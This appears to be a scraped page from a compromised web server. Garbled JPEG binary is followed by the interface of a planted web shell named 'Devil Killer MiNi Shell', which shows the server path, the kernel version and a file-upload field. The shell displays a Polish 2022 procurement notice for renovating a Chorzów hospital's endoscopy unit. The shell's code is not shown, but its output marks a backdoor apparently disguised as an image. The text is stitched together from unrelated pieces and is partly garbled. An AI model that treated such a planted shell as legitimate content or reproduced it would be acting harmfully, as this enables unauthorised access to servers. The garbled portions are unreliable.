JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221010/0038509401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja i przebudowa Pracowni Endoskopii </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ ZESPÓŁ SZPITALI MIEJSKICH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271503410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Strzelców Bytomskich 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chorzów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">323499268</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">323499299</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zsm.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zsm.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja i przebudowa Pracowni Endoskopii </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b58fd5e-464e-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00385094</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00255957/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja i przebudowa Pracowni Endoskopii</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zsm-chorzow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zsm-chorzow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a)	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej tj. Platformy zakupowej: https://zsm-chorzow.ezamawiajacy.pl. Ilekroć w dalszej części SWZ jest mowa o: „Platformie zakupowej” – należy przez to rozumieć narzędzie umożliwiające realizację procesu związanego z udzielaniem zamówień publicznych w formie elektronicznej służące szczególności do przekazywania ofert, oświadczeń zwane dalej „Platformą” lub „eZamawiający”. Informacje dotyczące odpowiedniego przygotowania stanowiska Wykonawcy znajdą na stronie: https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki<br/>b)	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Zespołu Szpitali Miejskich w Chorzowie; https://zsm-chorzow.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.<br/>c)	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. <br/>d)	Rejestracja konta następuje automatycznie poprzez: <br/>- podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym) lub, <br/>- kontakt z numerem telefonu podanym w potwierdzeniu lub, <br/>- jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie. Konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych.<br/>e)	Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia, informacje oraz dokumenty przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń, informacji oraz dokumentów przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. 2.	Obowiązek informacyjny wynikający z art. 13 RODO w przypadku zbierania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu związanym z postępowaniem o udzielenie zamówienia publicznego – Klauzula informacyjna dotycząca Zamawiającego została zamieszczona na ostatniej stronie niniejszej Specyfikacji warunków zamówienia (dalej w treści: SWZ). Natomiast, klauzula informacyjna dotycząca Wykonawcy ujęta jest w pkt 17 załącznika nr 1 do SWZ – „Formularz ofertowy”. Wykonawca zobowiązany jest zapoznać wszystkich pracowników z klauzulą dot. powierzenia danych osobowych, a których dane zostaną przekazane Zamawiającemu w trakcie i po rozstrzygnięciu postępowania.<br/>RODO – Rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04 maja 2016, str. 1-88).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSM/ZP/26/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 867317,37 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.1.	Przedmiotem niniejszego zamówienia jest realizacja zadania polegającego na remoncie i przebudowie istniejącej Pracowni Endoskopii zlokalizowanej na kondygnacji przyziemnej w Pawilonie II SP ZOZ Zespołu Szpitali Miejskich w Chorzowie przy ulicy Strzelców Bytomskich 11. W ramach zadania pn. „Modernizacja i przebudowa Pracowni Endoskopii”, polegającego na wykonaniu przebudowy istniejących pomieszczeń wchodzi, w szczególności:<br/>a)	w zakresie budowlanym:<br/>•	przebudowa pomieszczeń Pracowni Endoskopii, pomieszczeń sąsiednich oraz remont pomieszczeń towarzyszących w celu poprawy układu funkcjonalno-przestrzennego ww. Pracowni wskazanego w dokumentacji projektowej oaz dostosowania do obowiązujących przepisów;<br/>•	wyburzenia i demontaże istniejących przegród pionowych - bez ingerencji w układ konstrukcyjny budynku;<br/>•	wykonanie nowych przegród pionowych;<br/>•	roboty tynkarskie;<br/>•	roboty malarskie;<br/>•	roboty wykończeniowe ścian i sufitów;<br/>•	wykonanie nowych posadzek PVC;<br/>•	wykonanie nowych okładzin ściennych; <br/>•	wymiana i montaż nowej stolarki drzwiowej;<br/>•	wymiana i montaż nowej stolarki okiennej wewnętrznej;<br/>•	wymiana istniejących rolet wewnętrznych;<br/>•	demontaż istniejących sufitów wraz z wykonaniem nowych podwieszanych, modułowych, kasetonowych;<br/>•	zakup i montaż elementów wyposażenia i sprzętu - za wyjątkiem sprzętu medycznego oraz komputerowego; <br/>b)	w zakresie instalacyjnym - wykonanie niezbędnych - ze względu na zmianę układu funkcjonalno-przestrzennego Pracowni, jak również na stan techniczny - instalacji, w tym:<br/>•	przebudowa instalacji wodociągowych (wody zimnej, c.w.u., cyrkulacji, wody uzdatnionej);<br/>•	przebudowa instalacji kanalizacji sanitarnej;<br/>•	montaż urządzeń sanitarnych; <br/>•	budowa instalacji klimatyzacji;<br/>•	przebudowa i rozbudowa instalacji wentylacji mechanicznej;<br/>•	remont i rozbudowa instalacji centralnego ogrzewania, w tym wymiana i montaż nowych grzejników w Pracowni;<br/>•	budowa instalacji gazów medycznych (powietrze, tlen, próżnia);<br/>•	przebudowa instalacji elektrycznej wraz z podłączeniem do istniejącej tablicy rozdzielczej oraz wykonanie nowej; <br/>•	przebudowa instalacji teletechnicznych, sieci okablowania strukturalnego wraz z dedykowaną instalacją elektryczną, telefoniczną, sieci komputerowej; <br/>•	przebudowa instalacji oświetleniowej;<br/>•	budowa instalacji awaryjnego oświetlenia ewakuacyjnego; <br/>•	budowa instalacji SSP. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45215140-0 - Roboty budowlane w zakresie obiektów szpitalnych</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">24111500-0 - Gazy medyczne</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45432000-4 - Kładzenie i wykładanie podłóg, ścian i tapetowanie ścian</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">c)	Zamawiający przewiduje możliwość udzielenia zamówienia polegającego na powtórzeniu podobnych robót budowlanych w przypadku udzielenia w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy robót budowlanych na podstawie art. 214 ust. 1 pkt 7 UPZP, których wartość stanowi nie więcej niż 30 % wartości netto zamówienia podstawowego. Roboty budowlane muszą być o podobnym charakterze tj. zgodne z robotami budowlanymi opisanymi w pkt 2 SWZ.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1.	Przy wyborze i ocenie oferty Zamawiający będzie się kierować wyłącznie następującymi kryteriami:<br/>Cena oferty - 60%<br/>Gwarancja: 20 %<br/>Doświadczenie Kierownika: 20 %<br/><br/>a)	Kryterium Cena oferty (Pc):<br/>1)	Ocena kryterium zostanie obliczona wg wzoru: <br/>„Pc =Cn / Cb * 60”, gdzie:<br/>Pc punkty otrzymane za cenę <br/>Cn cena najniższej oferty<br/>Cb cena badanej oferty<br/>2)	Oferta w kryterium cena może otrzymać maksymalnie 60 punktów, pozostałe oferty proporcjonalnie mniej.<br/><br/>b)	Kryterium: Gwarancja (Pg):<br/>1)	Ocena kryterium zostanie obliczona w następujący sposób:<br/><br/>Punkty za kryterium Gwarancja (Pg) zostaną przyznane w skali od 0-20 punktów.<br/><br/>Za wydłużenie minimalnego terminu gwarancji o rok Wykonawca otrzyma 10 punktów. Natomiast przy zaoferowaniu terminu gwarancji dłuższego o 2 lata w porównaniu z terminem minimalnym Wykonawca otrzyma 20 punktów. Minimalny okres gwarancji to 36 miesięcy, maksymalny okres gwarancji to 60 miesięcy. Za zaoferowanie 36 miesięcznego okresu gwarancji Wykonawca otrzyma 0 punktów. <br/><br/>Wykonawcy, który nie poda w ofercie okresu gwarancji zostanie przyznane w niniejszym kryterium 0 pkt. Zamawiający w sytuacji opisanej powyżej uzna, że Wykonawca oferuje termin gwarancji wynoszący 36 miesięcy. Gwarancja liczona będzie od dnia podpisania bezusterkowego Protokołu Odbioru Końcowego. Zamawiający zastrzega, że termin gwarancji podany przez Wykonawcę w dniach zostanie zmieniony na miesiące, natomiast podany w niepełnych miesiącach zostanie zaokrąglony w górę (np. 38 miesięcy zostanie zamienione na 48 miesięcy).<br/>36 miesięcy - 0 pkt<br/>48 miesięcy - 10 pkt<br/>60 miesięcy - 20 pkt<br/><br/>2) Oferta w tym kryterium może otrzymać maksymalnie 20 punktów.<br/><br/>c)	Kryterium: Doświadczenie Kierownika (Pd):<br/><br/>1)	Ocena kryterium zostanie obliczona w następujący sposób:<br/>Punkty za kryterium Doświadczenie Kierownika Budowy (Pd1) zostaną przyznane w skali od 0 -10 punktów.<br/><br/>1 wykonana robota budowlana polegająca na przebudowie budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto - 0 pkt<br/>2 - 3 wykonanych robót budowlanych polegająca na przebudowie budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto - 5 pkt<br/>więcej niż 3 wykonanych robót budowlanych polegająca na przebudowie budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto - 10 pkt<br/><br/>Punkty za kryterium Doświadczenie Kierownika w specjalności elektrycznej (Pd2) zostaną przyznane w skali od 0-5 punktów.<br/><br/>1 wykonana robota budowlana polegająca na przebudowie budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto - 0 pkt<br/>2 - 3 wykonanych robót budowlanych polegająca na przebudowie budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto - 2 pkt<br/>więcej niż 3 wykonanych robót budowlanych polegająca na przebudowie budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto - 5 pkt<br/><br/>Punkty za kryterium Doświadczenie Kierownika w specjalności sanitarnej (Pd3) zostaną przyznane w skali od 0-5 punktów.<br/>1 wykonana robota budowlana polegająca na przebudowie budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto - 0 pkt<br/>2 - 3 wykonanych robót budowlanych polegająca na przebudowie budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto - 2 pkt<br/>więcej niż 3 wykonanych robót budowlanych polegająca na przebudowie budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto - 5 pkt<br/><br/>2)	Oferta w tym kryterium może otrzymać maksymalnie 20 punktów. Ocenę końcową w tym kryterium stanowić będzie suma punktów poszczególnych kryteriów „Doświadczenie kierownika” obliczonych zgodnie z poniższym wzorem:<br/>Pd = Pd1 + Pd2 + Pd3<br/><br/>13.2.	Ocenę końcową oferty stanowić będzie suma punktów poszczególnych kryteriów obliczonych zgodnie z poniższym wzorem:<br/>Pc + Pg + Pd = Ocena końcowa oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4.2.	O udzielenie zamówienia w postępowaniu mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału:<br/>a)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie ustanawia warunku.<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie ustanawia warunku.<br/>c)	sytuacji ekonomicznej lub finansowej – Zamawiający nie ustanawia warunku.<br/>d)	zdolności technicznej lub zawodowej – tzn. warunek rozumiany w ten sposób, iż Wykonawca wykonał/dysponuje (obowiązują wszystkie warunki łącznie):<br/><br/>I.	Zamawiający stawia warunki dotyczące zdolności technicznej:<br/>- wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – to w tym okresie, co najmniej 1 robotę budowlaną polegającą na prowadzeniu robót budowlanych w obiekcie użyteczności publicznej o wartości brutto nie niższej niż 500 000,00 zł brutto (pięćset tysięcy złotych brutto), <br/><br/>II.	Zamawiający stawia warunek dotyczący zdolności zawodowej:<br/>- dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi wymagane niżej uprawnienia w co najmniej następujących specjalnościach: <br/>a)	do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów, zwanego dalej Kierownikiem Budowy, posiadającą: <br/>•	co najmniej pięcioletnie doświadczenie w kierowaniu robotami budowlanymi w w/w specjalności; <br/>•	doświadczenie w pełnieniu funkcji Kierownika Budowy, przy kierowaniu co najmniej 1 robotą budowlaną przebudowy budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto (pięćset tysięcy złotych brutto), <br/>•	co najmniej dwuletnie doświadczenie w kierowaniu robotami budowlanymi przy zabytkach nieruchomych wpisanych do rejestru zabytków oraz posiadający kwalifikacje, o których mowa w art. 37 c ustawy z dnia 23 lipca 2003 roku o ochronie zabytków i opiece nad zabytkami (t.j. Dz.U. 2022 poz. 840)<br/>b)	do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektroenergetycznych bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów, posiadającą: <br/>•	co najmniej pięcioletnie doświadczenie w kierowaniu robotami budowlanymi w w/w specjalności; <br/>•	doświadczenie w pełnieniu funkcji Kierownika Budowy, przy kierowaniu co najmniej 1 robotą budowlaną przebudowy budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto (pięćset tysięcy złotych brutto),, <br/>c)	do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i 